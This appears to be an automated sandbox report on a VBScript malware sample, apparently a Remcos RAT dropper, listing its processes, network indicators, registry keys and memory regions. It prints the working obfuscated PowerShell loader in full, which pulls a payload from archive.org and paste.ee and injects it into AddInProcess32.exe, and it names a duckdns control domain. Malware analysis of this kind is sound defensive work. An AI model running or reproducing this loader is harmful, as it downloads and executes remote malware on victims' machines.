Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sostener.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\registros.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tywwnyo.0ep.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mbirvsr.mjx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0sszj1e.el2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfyjcqr2.gsg.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent
= '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly
= ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method
= '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I
,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')')
-cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtc9I;k8fbase64Content
|
unknown
|
|
|
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
|
|
|
https://paste.ee/d/WksSo/0
|
188.114.97.3
|
|
|
|
newssssssssssssss.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
newssssssssssssss.duckdns.org
|
181.236.206.3
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
181.236.206.3
|
newssssssssssssss.duckdns.org
|
Colombia
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-XDNGQ0
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-XDNGQ0
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-XDNGQ0
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B09F79E000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
1B09FD47000
|
trusted library allocation
|
page read and write
|
|
|
|
1B0A07E0000
|
trusted library allocation
|
page read and write
|
|
|
|
B68000
|
heap
|
page read and write
|
|
|
|
1B0A7DC0000
|
trusted library section
|
page read and write
|
|
|
|
1B08F3E6000
|
heap
|
page read and write
|
||
|
1FEADA2E000
|
heap
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
1B08D6F4000
|
heap
|
page read and write
|
||
|
1B0A7BEC000
|
heap
|
page read and write
|
||
|
290F000
|
stack
|
page read and write
|
||
|
1A97F540000
|
heap
|
page read and write
|
||
|
1A97F80E000
|
heap
|
page read and write
|
||
|
1B08D6CF000
|
heap
|
page read and write
|
||
|
1FE9398C000
|
heap
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
757C67F000
|
stack
|
page read and write
|
||
|
1A97F5C3000
|
heap
|
page read and write
|
||
|
1B090E53000
|
trusted library allocation
|
page read and write
|
||
|
1FEA599D000
|
trusted library allocation
|
page read and write
|
||
|
1B0A7BDD000
|
heap
|
page read and write
|
||
|
1A97F588000
|
heap
|
page read and write
|
||
|
1FE938C0000
|
heap
|
page read and write
|
||
|
1A97F7F3000
|
heap
|
page read and write
|
||
|
41811BE000
|
stack
|
page read and write
|
||
|
1FE93AD0000
|
trusted library allocation
|
page read and write
|
||
|
1B0A7BB0000
|
heap
|
page read and write
|
||
|
1B0A77C7000
|
heap
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
7DF49B100000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B091070000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B08FB3B000
|
trusted library allocation
|
page read and write
|
||
|
757C97E000
|
stack
|
page read and write
|
||
|
1FE93C40000
|
heap
|
page read and write
|
||
|
82DBDFE000
|
stack
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
1A97F4B8000
|
heap
|
page read and write
|
||
|
1B090FEA000
|
trusted library allocation
|
page read and write
|
||
|
1B08D6B9000
|
heap
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD349E4000
|
trusted library allocation
|
page read and write
|
||
|
1A97D653000
|
heap
|
page read and write
|
||
|
1B08F731000
|
trusted library allocation
|
page read and write
|
||
|
1B08FB37000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
757CAFB000
|
stack
|
page read and write
|
||
|
1FE959C5000
|
trusted library allocation
|
page read and write
|
||
|
1B0A7BC0000
|
heap
|
page read and write
|
||
|
1A97F493000
|
heap
|
page read and write
|
||
|
1B08D70E000
|
heap
|
page read and write
|
||
|
1B08F3E0000
|
heap
|
page read and write
|
||
|
1A97F6E0000
|
heap
|
page read and write
|
||
|
1A97F58D000
|
heap
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
|
1B08F3E4000
|
heap
|
page read and write
|
||
|
7B6000
|
heap
|
page read and write
|
||
|
7FFD34643000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B08D735000
|
heap
|
page read and write
|
||
|
1A97F7F1000
|
heap
|
page read and write
|
||
|
1A97F551000
|
heap
|
page read and write
|
||
|
1A97F598000
|
heap
|
page read and write
|
||
|
1FE93940000
|
heap
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
1FE93960000
|
heap
|
page read and write
|
||
|
7FFD3465D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B09FA27000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A97F4BD000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
2B4D000
|
stack
|
page read and write
|
||
|
1B08FD43000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
1A97F5BA000
|
heap
|
page read and write
|
||
|
1FE93860000
|
heap
|
page read and write
|
||
|
1B08D8A0000
|
heap
|
page read and write
|
||
|
7FFD34706000
|
trusted library allocation
|
page read and write
|
||
|
1A97F441000
|
heap
|
page read and write
|
||
|
1A97F817000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
1FE95A44000
|
trusted library allocation
|
page read and write
|
||
|
1B08FB3F000
|
trusted library allocation
|
page read and write
|
||
|
1FEAD9BC000
|
heap
|
page read and write
|
||
|
757BFDE000
|
stack
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
1B08FB2D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
757C879000
|
stack
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
2D4F000
|
stack
|
page read and write
|
||
|
1A97F46B000
|
heap
|
page read and write
|
||
|
1A97F467000
|
heap
|
page read and write
|
||
|
1A97F549000
|
heap
|
page read and write
|
||
|
1A97D560000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
1B0A7C40000
|
heap
|
page read and write
|
||
|
1A97F477000
|
heap
|
page read and write
|
||
|
1A97F840000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
1A97F4B0000
|
heap
|
page read and write
|
||
|
757C57E000
|
stack
|
page read and write
|
||
|
1A97F6BF000
|
heap
|
page read and write
|
||
|
1A97F6CA000
|
heap
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
1A97F5B3000
|
heap
|
page read and write
|
||
|
1FE9394C000
|
heap
|
page read and write
|
||
|
1A97F6C0000
|
heap
|
page read and write
|
||
|
1A97F80E000
|
heap
|
page read and write
|
||
|
1A97F472000
|
heap
|
page read and write
|
||
|
1A97D654000
|
heap
|
page read and write
|
||
|
1A97F5C3000
|
heap
|
page read and write
|
||
|
1B08FB22000
|
trusted library allocation
|
page read and write
|
||
|
1FEAD975000
|
heap
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
1B08D6F6000
|
heap
|
page read and write
|
||
|
1A97D5BF000
|
heap
|
page read and write
|
||
|
27CC000
|
stack
|
page read and write
|
||
|
757C273000
|
stack
|
page read and write
|
||
|
1B0A7769000
|
heap
|
page read and write
|
||
|
1A97F7F1000
|
heap
|
page read and write
|
||
|
1A97F8FE000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
4180C7D000
|
stack
|
page read and write
|
||
|
1A97F457000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
1A97F6C4000
|
heap
|
page read and write
|
||
|
1FE93BE7000
|
heap
|
page execute and read and write
|
||
|
1A97F5AF000
|
heap
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
1B090E42000
|
trusted library allocation
|
page read and write
|
||
|
82DC4FE000
|
stack
|
page read and write
|
||
|
1B08D7C0000
|
heap
|
page read and write
|
||
|
1A97D5B7000
|
heap
|
page read and write
|
||
|
1A97F7F0000
|
heap
|
page read and write
|
||
|
2ECF000
|
stack
|
page read and write
|
||
|
4181038000
|
stack
|
page read and write
|
||
|
1A97F488000
|
heap
|
page read and write
|
||
|
1B0913B6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34726000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FE93C10000
|
heap
|
page execute and read and write
|
||
|
1A97F541000
|
heap
|
page read and write
|
||
|
1A97D5AB000
|
heap
|
page read and write
|
||
|
4180D7E000
|
stack
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A97D550000
|
heap
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
1A97F7DA000
|
heap
|
page read and write
|
||
|
757C3FE000
|
stack
|
page read and write
|
||
|
4180EBE000
|
stack
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
2C4F000
|
stack
|
page read and write
|
||
|
7FFD34652000
|
trusted library allocation
|
page read and write
|
||
|
1A97F4BD000
|
heap
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
1FE93B00000
|
heap
|
page readonly
|
||
|
1FE95F28000
|
trusted library allocation
|
page read and write
|
||
|
1FE95A34000
|
trusted library allocation
|
page read and write
|
||
|
1B08D940000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
1A97F80E000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
1B08FD6A000
|
trusted library allocation
|
page read and write
|
||
|
1B0A77E5000
|
heap
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FEA5940000
|
trusted library allocation
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
1A97F452000
|
heap
|
page read and write
|
||
|
1A97F490000
|
heap
|
page read and write
|
||
|
1A97F44B000
|
heap
|
page read and write
|
||
|
1B090E77000
|
trusted library allocation
|
page read and write
|
||
|
1A97F818000
|
heap
|
page read and write
|
||
|
1A97F818000
|
heap
|
page read and write
|
||
|
1FE95DF5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
1A97F493000
|
heap
|
page read and write
|
||
|
1A97F6C2000
|
heap
|
page read and write
|
||
|
4180FBC000
|
stack
|
page read and write
|
||
|
1A97F8FE000
|
heap
|
page read and write
|
||
|
1A97F6D4000
|
heap
|
page read and write
|
||
|
1A97F6BF000
|
heap
|
page read and write
|
||
|
1A97F585000
|
heap
|
page read and write
|
||
|
1B08F7AF000
|
trusted library allocation
|
page read and write
|
||
|
82DBEFE000
|
stack
|
page read and write
|
||
|
1A97D940000
|
heap
|
page read and write
|
||
|
1B08D6EE000
|
heap
|
page read and write
|
||
|
1B0A7BF0000
|
heap
|
page read and write
|
||
|
1A97F6C3000
|
heap
|
page read and write
|
||
|
1A97F0F0000
|
heap
|
page read and write
|
||
|
1A97F578000
|
heap
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
1A97F7F2000
|
heap
|
page read and write
|
||
|
1B08D6B0000
|
heap
|
page read and write
|
||
|
1B09F740000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
1FE95A87000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
418123E000
|
stack
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
1A97F6C4000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
41812BB000
|
stack
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
1B08FDA9000
|
trusted library allocation
|
page read and write
|
||
|
278C000
|
stack
|
page read and write
|
||
|
1FE93BE0000
|
heap
|
page execute and read and write
|
||
|
1A97F7BD000
|
heap
|
page read and write
|
||
|
1FE939ED000
|
heap
|
page read and write
|
||
|
1A97F54C000
|
heap
|
page read and write
|
||
|
7FFD349F3000
|
trusted library allocation
|
page read and write
|
||
|
1FE939E5000
|
heap
|
page read and write
|
||
|
1B08FB67000
|
trusted library allocation
|
page read and write
|
||
|
1A97F841000
|
heap
|
page read and write
|
||
|
1B08D6F0000
|
heap
|
page read and write
|
||
|
1B08DA70000
|
heap
|
page read and write
|
||
|
1A97F7EB000
|
heap
|
page read and write
|
||
|
1A97D580000
|
heap
|
page read and write
|
||
|
1A97D5B6000
|
heap
|
page read and write
|
||
|
7FFD34801000
|
trusted library allocation
|
page read and write
|
||
|
1A97F4BC000
|
heap
|
page read and write
|
||
|
757C4FD000
|
stack
|
page read and write
|
||
|
757C37E000
|
stack
|
page read and write
|
||
|
757C7FC000
|
stack
|
page read and write
|
||
|
1FE95540000
|
heap
|
page read and write
|
||
|
1B090E4F000
|
trusted library allocation
|
page read and write
|
||
|
1B0A7BFC000
|
heap
|
page read and write
|
||
|
1A97F568000
|
heap
|
page read and write
|
||
|
1A97F7E8000
|
heap
|
page read and write
|
||
|
1A97D63B000
|
heap
|
page read and write
|
||
|
2A0F000
|
stack
|
page read and write
|
||
|
2800000
|
heap
|
page read and write
|
||
|
1B08FB8D000
|
trusted library allocation
|
page read and write
|
||
|
1A97F440000
|
heap
|
page read and write
|
||
|
82DC6FB000
|
stack
|
page read and write
|
||
|
1FE9394A000
|
heap
|
page read and write
|
||
|
1A97D5B0000
|
heap
|
page read and write
|
||
|
7FFD349E8000
|
trusted library allocation
|
page read and write
|
||
|
1B0913BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34736000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0912F1000
|
trusted library allocation
|
page read and write
|
||
|
1B08F370000
|
heap
|
page read and write
|
||
|
7FFD347F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
1A97F6F3000
|
heap
|
page read and write
|
||
|
1A97D5B0000
|
heap
|
page read and write
|
||
|
7FFD347F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
1A97F6C6000
|
heap
|
page read and write
|
||
|
1FE95A8D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
82DBCFA000
|
stack
|
page read and write
|
||
|
757C777000
|
stack
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
1B0A7860000
|
heap
|
page execute and read and write
|
||
|
1A97F4BC000
|
heap
|
page read and write
|
||
|
82DC0FF000
|
stack
|
page read and write
|
||
|
1B0A7BC6000
|
heap
|
page read and write
|
||
|
7FFD34822000
|
trusted library allocation
|
page read and write
|
||
|
4180F37000
|
stack
|
page read and write
|
||
|
4180A73000
|
stack
|
page read and write
|
||
|
1B09FA19000
|
trusted library allocation
|
page read and write
|
||
|
1FE93B80000
|
trusted library allocation
|
page read and write
|
||
|
1B08DA74000
|
heap
|
page read and write
|
||
|
274E000
|
stack
|
page read and write
|
||
|
1A97F7DA000
|
heap
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
4180B7E000
|
stack
|
page read and write
|
||
|
1FEADBA0000
|
heap
|
page read and write
|
||
|
1A97D945000
|
heap
|
page read and write
|
||
|
1A97F4BC000
|
heap
|
page read and write
|
||
|
1B091015000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
4181C8E000
|
stack
|
page read and write
|
||
|
1B0A7900000
|
heap
|
page read and write
|
||
|
4180CFF000
|
stack
|
page read and write
|
||
|
1B08D9B0000
|
trusted library allocation
|
page read and write
|
||
|
1FE955E6000
|
heap
|
page read and write
|
||
|
1A97F59D000
|
heap
|
page read and write
|
||
|
1A97F7D2000
|
heap
|
page read and write
|
||
|
1FEADF80000
|
heap
|
page read and write
|
||
|
7FFD3470C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
1A97F56D000
|
heap
|
page read and write
|
||
|
1A97F6C1000
|
heap
|
page read and write
|
||
|
757C2FE000
|
stack
|
page read and write
|
||
|
1FEAD9DF000
|
heap
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
1FE955E0000
|
heap
|
page read and write
|
||
|
7FFD34832000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
1A97F588000
|
heap
|
page read and write
|
||
|
1A97F462000
|
heap
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
B3E000
|
stack
|
page read and write
|
||
|
1A97D5AA000
|
heap
|
page read and write
|
||
|
41810BE000
|
stack
|
page read and write
|
||
|
1B08F225000
|
heap
|
page read and write
|
||
|
1FE9597A000
|
trusted library allocation
|
page read and write
|
||
|
1A97F6C9000
|
heap
|
page read and write
|
||
|
1B0A7730000
|
heap
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
1FE95994000
|
trusted library allocation
|
page read and write
|
||
|
1FE93880000
|
heap
|
page read and write
|
||
|
7FFD347FA000
|
trusted library allocation
|
page read and write
|
||
|
1A97F7E9000
|
heap
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
1B08F953000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
1B08D980000
|
trusted library allocation
|
page read and write
|
||
|
1FEA5931000
|
trusted library allocation
|
page read and write
|
||
|
1FE95A48000
|
trusted library allocation
|
page read and write
|
||
|
1B08F3A0000
|
heap
|
page execute and read and write
|
||
|
7FFD34642000
|
trusted library allocation
|
page read and write
|
||
|
1B08D900000
|
heap
|
page read and write
|
||
|
1FE95CEF000
|
trusted library allocation
|
page read and write
|
||
|
757CA7E000
|
stack
|
page read and write
|
||
|
1A97F447000
|
heap
|
page read and write
|
||
|
1FE93850000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3466B000
|
trusted library allocation
|
page read and write
|
||
|
1A97F57D000
|
heap
|
page read and write
|
||
|
2B0F000
|
stack
|
page read and write
|
||
|
1FE95E5F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
AFB000
|
stack
|
page read and write
|
||
|
1FE939F0000
|
heap
|
page read and write
|
||
|
1FE93C45000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
300F000
|
stack
|
page read and write
|
||
|
1B08D9B2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3480A000
|
trusted library allocation
|
page read and write
|
||
|
1A97F740000
|
heap
|
page read and write
|
||
|
1B08D970000
|
heap
|
page readonly
|
||
|
1FE95B1A000
|
trusted library allocation
|
page read and write
|
||
|
418113E000
|
stack
|
page read and write
|
||
|
1FEAD930000
|
heap
|
page read and write
|
||
|
7FFD34644000
|
trusted library allocation
|
page read and write
|
||
|
1B0A7BC2000
|
heap
|
